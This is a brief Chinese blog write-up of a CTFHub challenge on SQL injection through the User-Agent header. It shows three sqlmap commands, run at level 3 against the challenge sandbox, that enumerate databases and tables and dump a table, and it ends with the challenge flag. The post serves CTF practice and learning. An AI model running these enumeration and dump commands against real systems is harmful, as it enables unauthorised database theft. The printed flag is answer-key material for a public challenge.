CTFHUB-SQL注入-UA注入

Pale1c

于 2021-07-10 14:47:53 发布

阅读量1k

点赞数

分类专栏： CTFHUB

本文链接：https://blog.csdn.net/u014794539/article/details/118634805

版权

CTFHUB 专栏收录该内容

15 篇文章 0 订阅

订阅专栏

考点
SQL注入 UA注入
问题分析

他直说了UA注入点
可以跟Cookie注入一样弄 BP抓包发包
也可以直接sqlmap -u去跑这几个题过程差不多这里就用工具了

因为是UA注入了所以用level3

python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/  --level 3 --dbs
 
python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/  --level 3 -D sqli --tables
 
python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/  --level 3 -D sqli -T asqmhkqrnf --columns --dump

先是asqmhkqrnf最后得到flag
在这里插入图片描述

flag

ctfhub{38b9e00b109a227eae8a9006}

Pale1c

关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
CTFHUB-SQL注入-UA注入

考点SQL注入 UA注入问题分析他直说了UA注入点可以跟Cookie注入一样弄 BP抓包发包也可以直接sqlmap -u去跑这几个题过程差不多这里就用工具了因为是UA注入了所以用level3python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 --dbs python2 sqlmap.py -u http://challenge-81256235
复制链接

扫一扫

专栏目录